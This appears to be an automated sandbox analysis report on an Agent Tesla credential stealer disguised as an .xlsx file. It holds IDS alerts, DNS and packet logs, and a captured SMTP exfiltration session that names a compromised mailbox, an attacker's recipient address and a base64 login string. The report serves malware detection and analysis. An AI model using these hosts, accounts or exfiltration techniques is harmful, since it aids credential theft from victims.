Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9EA20D34 [Sun May 3 11:25:40 2054 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0xb04	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x65192	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x63248	0x63400	4115f4ad36f8de40afeb6da516ea352a	False	0.33515034634760704	data	5.512947353382107	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x66000	0xb04	0xc00	7fd8bc10a933f78efb29085410639568	False	0.2825520833333333	data	4.289010697698533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x660b8	0x430	data			0.4869402985074627
RT_VERSION	0x664e8	0x430	data	English	United States	0.4869402985074627
RT_MANIFEST	0x66918	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-09:46:07.222431	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49733	587	192.168.2.4	23.235.199.60
04/24/24-09:46:07.222431	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49733	587	192.168.2.4	23.235.199.60
04/24/24-09:46:07.222364	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49733	587	192.168.2.4	23.235.199.60
04/24/24-09:46:07.222431	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49733	587	192.168.2.4	23.235.199.60
04/24/24-09:46:07.222431	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49733	587	192.168.2.4	23.235.199.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 09:46:03.750829935 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:03.750915051 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:03.751000881 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:03.760715008 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:03.760786057 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.099401951 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.099522114 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:04.103116989 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:04.103151083 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.103569031 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.157160997 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:04.253047943 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:04.300123930 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.543179035 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.543328047 CEST	443	49730	172.67.74.152	192.168.2.4
Apr 24, 2024 09:46:04.543404102 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:04.549958944 CEST	49730	443	192.168.2.4	172.67.74.152
Apr 24, 2024 09:46:05.337100029 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:05.556057930 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:05.556162119 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:05.885828018 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:05.886177063 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:06.105417967 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:06.106548071 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:06.330456018 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:06.330763102 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:06.554932117 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:06.555237055 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:06.773108959 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:06.773406982 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.003300905 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.003572941 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.221607924 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.221647978 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.222363949 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.222430944 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.222459078 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.222482920 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:46:07.440509081 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.440804958 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.442172050 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:46:07.485315084 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:47:45.079394102 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:47:45.337261915 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:47:45.503002882 CEST	587	49733	23.235.199.60	192.168.2.4
Apr 24, 2024 09:47:45.503154039 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:47:45.503267050 CEST	49733	587	192.168.2.4	23.235.199.60
Apr 24, 2024 09:47:45.722826958 CEST	587	49733	23.235.199.60	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 09:46:03.585136890 CEST	49453	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:46:03.739792109 CEST	53	49453	1.1.1.1	192.168.2.4
Apr 24, 2024 09:46:05.064358950 CEST	58547	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:46:05.335910082 CEST	53	58547	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 09:46:03.585136890 CEST	192.168.2.4	1.1.1.1	0xbad6	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:46:05.064358950 CEST	192.168.2.4	1.1.1.1	0x2ab1	Standard query (0)	webmail.zerotime.com.cy	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 09:46:03.739792109 CEST	1.1.1.1	192.168.2.4	0xbad6	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:46:03.739792109 CEST	1.1.1.1	192.168.2.4	0xbad6	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:46:03.739792109 CEST	1.1.1.1	192.168.2.4	0xbad6	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:46:05.335910082 CEST	1.1.1.1	192.168.2.4	0x2ab1	No error (0)	webmail.zerotime.com.cy	23.235.199.60	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.74.152	443	2060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 07:46:04 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-24 07:46:04 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 07:46:04 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 87947a395a5adbd1-LAX
2024-04-24 07:46:04 UTC	13	IN	Data Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 Data Ascii: 154.16.105.36

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 24, 2024 09:46:05.885828018 CEST	587	49733	23.235.199.60	192.168.2.4	220-ecres336.servconfig.com ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 03:46:05 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 24, 2024 09:46:05.886177063 CEST	49733	587	192.168.2.4	23.235.199.60	EHLO 721680
Apr 24, 2024 09:46:06.105417967 CEST	587	49733	23.235.199.60	192.168.2.4	250-ecres336.servconfig.com Hello 721680 [154.16.105.36] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Apr 24, 2024 09:46:06.106548071 CEST	49733	587	192.168.2.4	23.235.199.60	AUTH login ZHZhc3Npc0B6ZXJvdGltZS5jb20uY3k=
Apr 24, 2024 09:46:06.330456018 CEST	587	49733	23.235.199.60	192.168.2.4	334 UGFzc3dvcmQ6
Apr 24, 2024 09:46:06.554932117 CEST	587	49733	23.235.199.60	192.168.2.4	235 Authentication succeeded
Apr 24, 2024 09:46:06.555237055 CEST	49733	587	192.168.2.4	23.235.199.60	MAIL FROM:<dvassis@zerotime.com.cy>
Apr 24, 2024 09:46:06.773108959 CEST	587	49733	23.235.199.60	192.168.2.4	250 OK
Apr 24, 2024 09:46:06.773406982 CEST	49733	587	192.168.2.4	23.235.199.60	RCPT TO:<nolimitforce@yandex.com>
Apr 24, 2024 09:46:07.003300905 CEST	587	49733	23.235.199.60	192.168.2.4	250 Accepted
Apr 24, 2024 09:46:07.003572941 CEST	49733	587	192.168.2.4	23.235.199.60	DATA
Apr 24, 2024 09:46:07.221647978 CEST	587	49733	23.235.199.60	192.168.2.4	354 Enter message, ending with "." on a line by itself
Apr 24, 2024 09:46:07.222482920 CEST	49733	587	192.168.2.4	23.235.199.60	.
Apr 24, 2024 09:46:07.442172050 CEST	587	49733	23.235.199.60	192.168.2.4	250 OK id=1rzXKR-004qnX-0N
Apr 24, 2024 09:47:45.079394102 CEST	49733	587	192.168.2.4	23.235.199.60	QUIT
Apr 24, 2024 09:47:45.503002882 CEST	587	49733	23.235.199.60	192.168.2.4	221 ecres336.servconfig.com closing connection

Target ID:	0
Start time:	09:46:00
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\M_F+niestandardowy stempel.xlsx.exe"
Imagebase:	0x1fe21580000
File size:	1'014'893 bytes
MD5 hash:	32FF58FAA9596522B0062F2692B0D96A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1814357877.000001FE23185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1816336840.000001FE33147000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:46:00
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:46:01
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xce0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2886508442.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2885370305.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2886508442.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2886508442.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:46:01
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xee0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:46:01
Start date:	24/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6696 -s 1076
Imagebase:	0x7ff7605c0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B891DD8 Relevance: 8.5, Strings: 2, Instructions: 6003
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD9B8965D9
, xrefs: 00007FFD9B89AB99

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID: $H
API String ID: 0-1323546614
Opcode ID: 9cdc57c7eb77aeed24729ee7eb022fb5ad9e1d786094ec9b004177b83a4b310e
Instruction ID: 785115c51faa128a73ff572f60aa618222920a6184a71cc8d6d58b6521eac315
Opcode Fuzzy Hash: 9cdc57c7eb77aeed24729ee7eb022fb5ad9e1d786094ec9b004177b83a4b310e
Instruction Fuzzy Hash: 7AA32130608A4D4FDB59DB58C450BA5B7A2FF9D304F6486EDD04ED72D2CE36AA82CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A6058 Relevance: 5.4, Strings: 3, Instructions: 1667COMMON

Download Yara Rule

Strings

VL_H, xrefs: 00007FFD9B8AE5C3
8L_H, xrefs: 00007FFD9B8AEC71
4W_H, xrefs: 00007FFD9B8AEFCE

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID: 4W_H$8L_H$VL_H
API String ID: 0-1210358828
Opcode ID: b12e7f18ced5e486bc3dabd82400bc7215411c940e05604eecdd7f7844120409
Instruction ID: bc0279994568f08ccfb14ea81d6b5c96d50f8370787107adbd62119b01f1e358
Opcode Fuzzy Hash: b12e7f18ced5e486bc3dabd82400bc7215411c940e05604eecdd7f7844120409
Instruction Fuzzy Hash: 0DC2E530B09A4D8FDBA8DB58C4A5AB877E1FF59301F1504BAD04EC76A2DE34AD42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89EBF8 Relevance: 2.0, Strings: 1, Instructions: 727
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00007FFD9B8A24DF

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 00daa9ebf01b59cb4229e79cd88ef454151984ef39100cc6d57909dccbab9bb0
Instruction ID: f0037e02464aad7713f3fe9990b6cd8f62eeb5bb5fd69d427aef27aa149bfdc3
Opcode Fuzzy Hash: 00daa9ebf01b59cb4229e79cd88ef454151984ef39100cc6d57909dccbab9bb0
Instruction Fuzzy Hash: 03225431A1EA494FE769DFA898A157173D0FF49310B0502BAD45EC71ABEE28F842C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A1D88 Relevance: 1.7, Strings: 1, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFD9B8A1DE0

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: 2b5a27ff043538f16afec060b408674d0e2a707d9980d7f7e9ecee14a025e81f
Instruction ID: 56ded4e37d08f3e8b248051859b14f068d3b079e48402e0bd57de4d0807b4409
Opcode Fuzzy Hash: 2b5a27ff043538f16afec060b408674d0e2a707d9980d7f7e9ecee14a025e81f
Instruction Fuzzy Hash: 83D15B31B1DB4E0FE76DAB68986547577E1EF9A310B0542BEE48BC31E3ED24AD028341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8AC3AD Relevance: 1.6, Instructions: 1579
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab33f81b5c6dbc547ecac6ccfa24f2ea99780965573ed536f6a7073fdcd87ece
Instruction ID: 3109cb8fc6e4021b51c2e2700284794f38ddd1226c5d26d2c7860f0af0607f0a
Opcode Fuzzy Hash: ab33f81b5c6dbc547ecac6ccfa24f2ea99780965573ed536f6a7073fdcd87ece
Instruction Fuzzy Hash: 26B28C30A0DB494FD359DB28C8A44B5B7E1FFC9301B1445BEE48AC72A6DE34E946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A6050 Relevance: .9, Instructions: 930COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45cb00de5e3ab614e1513f0ddeb58d472e939374cfcffc7ff09f2663174d62e
Instruction ID: 047e2dc1303d953049f87323111741ea7fe7936f656da7f0ac27d96fcac5ea38
Opcode Fuzzy Hash: e45cb00de5e3ab614e1513f0ddeb58d472e939374cfcffc7ff09f2663174d62e
Instruction Fuzzy Hash: 92521530B09A0D8FDB68DB68D465A7977E1EF58301F1501BEE08EC76A2DE34AD428791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B894309 Relevance: .9, Instructions: 884COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e52b2160331a2a67244b73e9542b671a644bb354b2270b02a02c0f0ea4c14a
Instruction ID: 91e040f498a8203e5e2fbe927597cdfa5aa0dd827182eb6a039a0f6db73429ed
Opcode Fuzzy Hash: 30e52b2160331a2a67244b73e9542b671a644bb354b2270b02a02c0f0ea4c14a
Instruction Fuzzy Hash: 68422830B1DA4A4FEB2DAB68D8616B977D1FF49300F1501BED49E835E7DD28B8428781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8929A1 Relevance: .8, Instructions: 776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8676575b49b941c6518d18b7ff7d2e20d99dceffb67c4c9e51df34d2641fdaa
Instruction ID: 240bb27b6437a1ab24a2d780d96d71f9cfe1821254388d11111b2e16f67a722c
Opcode Fuzzy Hash: e8676575b49b941c6518d18b7ff7d2e20d99dceffb67c4c9e51df34d2641fdaa
Instruction Fuzzy Hash: 2842E331B19A0A4FEB69EBA8C4605797BD1FF4D310B16457DD08EC72E2DE28BA42C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A9430 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3f8a2aa99edbb2e12fc643f3de020713bc1c688ee7aaf32f35b65da5a40e97
Instruction ID: be3a10004d424f6238db63ad40e044e85c80ce19bbc2a6384774e7241bac9f47
Opcode Fuzzy Hash: 1a3f8a2aa99edbb2e12fc643f3de020713bc1c688ee7aaf32f35b65da5a40e97
Instruction Fuzzy Hash: A5C1BD31A1EB894FE72DCB2884A5171B7D1FF99301B144ABED4CAC71B1DE28A542C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89FCB0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 269
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FFD9B89FEA1

Strings

$, xrefs: 00007FFD9B89FCDE

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID: LibraryLoad
String ID: $
API String ID: 1029625771-3993045852
Opcode ID: c3d2654ca86c3150988314d1b9890cb14d2e9499c1e0256ed6e644690b7b506c
Instruction ID: a240ce4369ffe833c368e2368f43f664decc902c92cd5a9748aed91ca0503e32
Opcode Fuzzy Hash: c3d2654ca86c3150988314d1b9890cb14d2e9499c1e0256ed6e644690b7b506c
Instruction Fuzzy Hash: 5F81E630608A8D4FEB6CDF68D8557F93BE1FF59310F14426EE80DC72A2DA75A9418781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B98026B Relevance: 2.3, Strings: 1, Instructions: 1050
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9B980786

Memory Dump Source

Source File: 00000000.00000002.1820292062.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: c179fa662fc00fbb733cd04ef6b7027041db6bff11434d2646276257a78f9856
Instruction ID: 22b8ac7c7fe7994ea84a8f8e7e62e93951d376e390fcbee99189835afffc76e3
Opcode Fuzzy Hash: c179fa662fc00fbb733cd04ef6b7027041db6bff11434d2646276257a78f9856
Instruction Fuzzy Hash: D3624972A1FF894FE766CB6888655A87BE0FF55700F0A05FED089CB0A3D9346946C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A02B4 Relevance: 1.6, APIs: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B8A0371

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a656f2cd21160c19513d59160a3abf14af78af14f293829e972430eea7ff0c6c
Instruction ID: 44b0c472bff8ba9ff94607fac8cb663589ee637e9acfc9fdf69e429e43dcc0dc
Opcode Fuzzy Hash: a656f2cd21160c19513d59160a3abf14af78af14f293829e972430eea7ff0c6c
Instruction Fuzzy Hash: 6B31E730A0CB4C8FDB18DB9C98466F97BE1EB55721F04426FD049C3292CF64A856C795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8908BD Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFD9B89093F

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
